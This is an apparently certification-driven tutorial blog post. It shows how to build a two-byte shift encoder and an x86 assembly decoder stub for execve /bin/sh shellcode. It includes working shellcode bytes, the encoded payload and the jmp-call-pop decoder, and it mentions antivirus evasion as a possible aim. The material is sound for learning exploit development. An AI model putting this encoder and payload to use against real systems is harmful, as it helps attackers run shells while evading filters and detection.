Linux x86 Two-Byte Shift Encoder

By August 27, 2018 August 30th, 2018 SLAE-x86

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134
Assignment number: 4
Github repo: https://github.com/kkirsche/SLAE


Introduction

Hey everyone! Today, we’re going to discuss how to create a custom encoder. This is a pretty straightforward encoder, based on the concept behind the Caesar cipher. Before we dig into the meat of today’s topic, let’s lay out the assignment requirements.

Requirements

  • Create a custom encoding scheme like the “insertion encoder” that was shown during the SLAE course.
  • Create a proof-of-concept using the execve-stack shellcode that was demonstrated during the course.
  • Encode the execve-stack shellcode using your encoder and validate that it functions as desired.

The execve-stack shellcode used can be seen below and in the assignment repository:
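
The embedded listing does not appear in this copy of the post. As a stand-in, the bytes below were reconstructed by subtracting the two shift values (6 and 23, introduced later in this post) from the encoded output shown further down, so treat them as a reconstruction and not the course’s exact listing. The per-instruction comments are my own reading of the opcodes, and the name EXECVE_STACK is just an illustrative label.

```python
# Reconstructed execve-stack shellcode, annotated per instruction.
EXECVE_STACK = bytes([
    0x31, 0xc0,                    # xor eax, eax
    0x50,                          # push eax         (NULL terminator for the string)
    0x68, 0x2f, 0x2f, 0x73, 0x68,  # push 0x68732f2f  ("//sh")
    0x68, 0x2f, 0x62, 0x69, 0x6e,  # push 0x6e69622f  ("/bin")
    0x89, 0xe3,                    # mov ebx, esp     (pointer to "/bin//sh")
    0x50,                          # push eax
    0x89, 0xe2,                    # mov edx, esp     (envp)
    0x53,                          # push ebx
    0x89, 0xe1,                    # mov ecx, esp     (argv)
    0xb0, 0x0b,                    # mov al, 0x0b     (execve syscall number)
    0xcd, 0x80,                    # int 0x80
])

print(len(EXECVE_STACK))  # 25
```

Note that the length is odd, which matters for the padding step discussed later.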

First things first

Why encode shellcode?

Encoding shellcode is very important to understand, and sadly it’s commonly misunderstood in my experience. Encoding shellcode, as you do with the different encoders available within Metasploit Framework, allows you to remove potentially bad characters from your shellcode. For example, null bytes, carriage returns, and line feeds may all be bad characters, depending on the target program.

In some cases, encoding will also get shellcode past antivirus, but it’s really not good at that these days. If evasion is the goal, you are much better off using something like shellcode encryption instead.
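
To make the idea of bad characters concrete, here is a minimal Python 3 sketch that reports where they occur. The function name find_bad_chars and the default bad-character set (null, line feed, carriage return) are illustrative assumptions; the real set depends entirely on the target program.

```python
def find_bad_chars(shellcode, bad_chars=b"\x00\x0a\x0d"):
    """Return (offset, byte) pairs for every bad character in shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad_chars]

clean = bytes.fromhex("31c050682f2f7368")  # xor eax, eax ; push eax ; push "//sh"
dirty = bytes.fromhex("b80b000000cd80")    # mov eax, 0xb ; int 0x80

print(find_bad_chars(clean))  # []
print(find_bad_chars(dirty))  # [(2, 0), (3, 0), (4, 0)]
```

The same check is worth running on the encoded output, since an encoder can introduce bad characters as easily as it removes them.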

What’s the difference between encoding and encryption?

Encoding and encryption are often mixed up, but it’s important to distinguish them. An encoder, such as base64 or hex encoding, uses a known algorithm to convert data from one format to another, usually to achieve a goal like the one we outlined earlier: removing bad characters, for example.

Encoding, though, is not encryption. Encryption occurs when some sort of secret value is involved. For example, symmetric encryption such as AES uses a key to transform the plaintext into its encrypted form; the result is then often hex encoded to ensure that the value displayed to users does not contain any non-printable characters (which it may without the encoding).

The difference to note is that encryption actively hides our content, while encoding is often easily recognizable and easily reversible.
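
As a small illustration of the “easily reversible” part, the sketch below hex encodes a handful of arbitrary bytes (a stand-in for ciphertext, not real AES output) and reverses the encoding again. No key or secret is involved at any point, which is exactly what separates encoding from encryption.

```python
import binascii

raw = bytes([0x00, 0x1b, 0x7f, 0x9c, 0xff])  # stand-in bytes, mostly non-printable

encoded = binascii.hexlify(raw)              # printable ASCII, no secret needed
print(encoded)                               # b'001b7f9cff'

decoded = binascii.unhexlify(encoded)        # anyone can reverse it
print(decoded == raw)                        # True
```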

Our Encoding Scheme

Simple single-byte shift ciphers, such as the Caesar cipher (which includes rotational encoding like ROT13), fall victim to frequency analysis even when we do not include a decoder stub. This means that, theoretically, our shellcode could be recovered easily without even knowing what rotation we used.

To make things a little bit more difficult for the receiving party, I decided to go with a two-byte shift cipher. This means that the shellcode has to be an even number of bytes to function, but it protects our payload a little bit better from that type of analysis. This probably won’t protect us from antivirus (because the decoder stub is pretty obvious), but it’s worth a shot.
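
The effect on frequency analysis can be sketched in a few lines of Python 3. The helper names shift and images_of are hypothetical, and the sample is just the two push instructions from the execve-stack shellcode. With one shift, every 0x2f maps to the same encoded byte; with two alternating shifts, the result depends on whether the byte sits at an even or odd offset.

```python
def shift(data, shifts):
    """Add shifts[i % len(shifts)] to each byte, wrapping at 256."""
    return bytes((b + shifts[i % len(shifts)]) % 256 for i, b in enumerate(data))

def images_of(plain, encoded, value):
    """Set of encoded bytes that one plaintext byte value maps to."""
    return {e for p, e in zip(plain, encoded) if p == value}

sample = bytes.fromhex("682f2f7368682f62696e")  # push "//sh" ; push "/bin"
one_byte = shift(sample, [0x06])
two_byte = shift(sample, [0x06, 0x17])

print(sorted(hex(v) for v in images_of(sample, one_byte, 0x2f)))  # ['0x35']
print(sorted(hex(v) for v in images_of(sample, two_byte, 0x2f)))  # ['0x35', '0x46']
```

This only muddies the picture slightly: anyone who analyzes the even and odd offsets separately is back to two ordinary single-byte shifts.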

Implementing our Two-Byte Shift Encoder

So we need to start off by creating an encoder. I like to start with the encoder because it’ll be in a higher-level language, so it’s easier for us to think through the implementation details. In our case, I chose to use Python to create a simple encoder script, which outputs our encoded shellcode in two forms: first as a C-formatted byte array, and second as a NASM-formatted byte array.

One thing to note about the script is this section:

if (shellcode_len % 2) != 0:
    shellcode += '\x90'
    shellcode_bytes = bytearray(shellcode)
    shellcode_len = len(shellcode_bytes)

Because we’re using a two-byte shift technique, we need to ensure that our shellcode is an even number of bytes. If it isn’t when we start, we append a no-operation (NOP, 0x90) instruction to the end of it.

Also of interest: we don’t define an explicit shellcode length, so that the encoder can be used for shellcode of any length. Instead, we append the two shift values themselves to the very end of the encoded shellcode. When the decoder subtracts the shifts from these bytes, the result is zero, which tells it that decoding is complete and the shellcode can be executed.
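
Padding and shifting together can be sketched as follows. This is a Python 3 approximation (bytes literals, unlike the str-based snippet above), and the names SHIFTS, pad_to_even and encode are my own. It also assumes the addition wraps modulo 256, which the example shellcode never actually exercises.

```python
SHIFTS = (0x06, 0x17)  # shift for even offsets, shift for odd offsets

def pad_to_even(shellcode):
    """Append a NOP (0x90) when the length is odd."""
    return shellcode + b"\x90" if len(shellcode) % 2 else shellcode

def encode(shellcode):
    """Pad, then add the alternating shifts to each byte, wrapping at 256."""
    padded = pad_to_even(shellcode)
    return bytes((b + SHIFTS[i % 2]) % 256 for i, b in enumerate(padded))

# 25-byte execve-stack shellcode, so one NOP is appended before encoding
original = bytes.fromhex("31c050682f2f7368682f62696e89e35089e25389e1b00bcd80")
encoded = encode(original)

print(len(original), len(encoded))  # 25 26
print(encoded[-2:].hex())           # 86a7
```

The final pair 86 a7 is the last real shellcode byte (0x80 + 6) followed by the encoded NOP (0x90 + 0x17).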


# mark the end of our shellcode with 0x06 (6 decimal) and 0x17 (23 decimal)
c_encoded += '\\x06\\x17'
nasm_encoded += '0x06, 0x17'

This outputs:


~ $ python encoder.py
Encoding shellcode...
\x37\xd7\x56\x7f\x35\x46\x79\x7f\x6e\x46\x68\x80\x74\xa0\xe9\x67\x8f\xf9\x59\xa0\xe7\xc7\x11\xe4\x86\xa7\x06\x17
0x37, 0xd7, 0x56, 0x7f, 0x35, 0x46, 0x79, 0x7f, 0x6e, 0x46, 0x68, 0x80, 0x74, 0xa0, 0xe9, 0x67, 0x8f, 0xf9, 0x59, 0xa0, 0xe7, 0xc7, 0x11, 0xe4, 0x86, 0xa7, 0x06, 0x17
Len: 28
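
For reference, the two output formats and the trailing marker can be reproduced with a short Python 3 sketch. The helper names c_format and nasm_format are hypothetical and not taken from the encoder script; the body bytes are the first 26 bytes of the output above.

```python
TERMINATOR = b"\x06\x17"  # the two shift values; each decodes to 0x00

def c_format(data):
    """Format bytes as a C string body, e.g. \\x37\\xd7"""
    return "".join("\\x%02x" % b for b in data)

def nasm_format(data):
    """Format bytes as a NASM db operand list, e.g. 0x37, 0xd7"""
    return ", ".join("0x%02x" % b for b in data)

body = bytes.fromhex("37d7567f3546797f6e46688074a0e9678ff959a0e7c711e486a7")
final = body + TERMINATOR

print(c_format(final))
print(nasm_format(final))
print("Len: %d" % len(final))  # Len: 28
```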

If you compare the original shellcode with the encoded output above, you can see that the first byte of each pair is shifted by +6 and the second byte by +23 (0x17). So our \x31 becomes \x37 and our \xc0 becomes \xd7.
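
The arithmetic is easy to check by hand or in Python 3. The sketch below assumes the shift wraps around at one byte (modulo 256), which is what the decoder’s sub byte instruction undoes; shift_byte is an illustrative name. The last two lines show the catch: some input bytes wrap to 0x00, which would put a null byte into the encoded output.

```python
def shift_byte(value, amount):
    """Add amount to a byte value, keeping the result within 0..255."""
    return (value + amount) & 0xFF

print(hex(shift_byte(0x31, 0x06)))  # 0x37
print(hex(shift_byte(0xc0, 0x17)))  # 0xd7

# Wrap-around cases: these inputs encode to a null byte
print(hex(shift_byte(0xfa, 0x06)))  # 0x0
print(hex(shift_byte(0xe9, 0x17)))  # 0x0
```

Neither 0xfa at an even offset nor 0xe9 at an odd offset occurs in the execve-stack shellcode, so the example output stays null-free.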

Creating an assembly decoder stub

With our encoder created, we’re ready to create a decoder. The decoder will remove the shift pattern which we applied earlier and detect when it has reached the end of the shellcode by looking for a zero value.

So let’s break down what’s happening here.


global _start
section .text
_start:
jmp short jcp ; Get address of shellcode

So here we start off with our normal boilerplate code. At the _start label, we have a jmp to jcp (a shortened label name indicating that this uses the jump (j), call (c), pop (p) technique). One thing to notice here is that _start is inside the .text section, which is normally mapped without write permission. While we can execute this code, as soon as we try to decode it in memory, we’ll crash the program with a SIGSEGV, and we don’t want that. We’ll be using a C shellcode harness later so that we can safely decode it.

After we take the jump, we end up at the jcp label:


jcp:
call shellcode_addr
shellcode: db 0x37, 0xd7, 0x56, 0x7f, 0x35, 0x46, 0x79, 0x7f, 0x6e, 0x46, 0x68, 0x80, 0x74, 0xa0, 0xe9, 0x67, 0x8f, 0xf9, 0x59, 0xa0, 0xe7, 0xc7, 0x11, 0xe4, 0x86, 0xa7, 0x06, 0x17

Here, the call instruction takes us to the shellcode_addr label (where we’ll retrieve the shellcode address using a pop), and our actual encoded shellcode follows it. Because call pushes the address of the next instruction as the return address, and what follows the call is our shellcode, the address of shellcode ends up on top of the stack for use in a moment.


shellcode_addr:
pop esi ; Store address of "shellcode" in esi

After we take the call, we pop the address of shellcode off the stack into ESI. ESI is a good choice because it’s not commonly clobbered by things like function calls. With our shellcode address in ESI, we then fall through into our final label, decoder.


decoder:
sub byte [esi], 0x06 ; Decode byte 1 at [esi]
inc esi
sub byte [esi], 0x17 ; Decode byte 2 at [esi]
jz shellcode
inc esi
jmp short decoder

The decoder is the heart of how we do our two-byte shift. First, we subtract 6 from the value at the location which ESI points to. Note, this isn’t adjusting the memory address, this is adjusting the actual value at the address.

We then increment ESI so that we move the address up one byte, and then perform our second byte shift, subtracting 23 (0x17) from the value at the location ESI points to.

We then check whether the zero flag is set. The second sub sets it only when the byte decodes to zero, which means we’ve hit our final two bytes and reached the end of the shellcode. If we’re at the end, we jump to the shellcode to begin executing it (in this case, popping a shell). If we aren’t, we increment ESI again, jump back to the start of the decoder, and repeat the process until the shellcode is fully decoded in memory.
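
To check the loop logic without touching a debugger, the stub can be mimicked in Python 3. This is only a model of the instruction sequence described above (the name run_decoder_stub and the bytearray standing in for memory are my own), but it is handy for confirming that an encoded blob decodes as expected before assembling anything.

```python
def run_decoder_stub(encoded):
    """Mimic the decoder loop on a mutable copy of the encoded bytes."""
    mem = bytearray(encoded)
    esi = 0
    while True:
        mem[esi] = (mem[esi] - 0x06) & 0xFF  # sub byte [esi], 0x06
        esi += 1                             # inc esi
        mem[esi] = (mem[esi] - 0x17) & 0xFF  # sub byte [esi], 0x17
        if mem[esi] == 0:                    # jz shellcode
            return bytes(mem)
        esi += 1                             # inc esi, then jmp short decoder

encoded = bytes.fromhex(
    "37d7567f3546797f6e46688074a0e9678ff959a0e7c711e486a70617"
)
decoded = run_decoder_stub(encoded)
print(decoded.hex())
# 31c050682f2f7368682f62696e89e35089e25389e1b00bcd80900000
```

The trailing 90 00 00 (the padding NOP and the decoded marker) sits after int 0x80, so it is never reached when execve succeeds. Without the marker, this model raises an IndexError; the real stub would simply keep decoding past the end of the shellcode.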

But it segfaults!

Now, if we use our normal compile harness to create a binary from our decoder, it’s going to fail with a segfault.

With that said, we still need the shellcode it produces, since it’ll include our decoder stub. As such, we run our compile script, dump the shellcode, and create a C testing harness.

Here, we have our shellcode in the shellcode character array. We print out its size and then pass execution to the shellcode, and... it works!

Wrapping up

Happily, this was one of the easier assignments so far in the SLAE course. The IPv6 code before definitely threw me for a bit of a loop due to the structure and address size differences. With this in mind, there is certainly more that could be done here if you wanted, such as making the shift values configurable. I’ll leave that to the reader as an exercise though. With that, happy hacking!

Kevin Kirsche

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.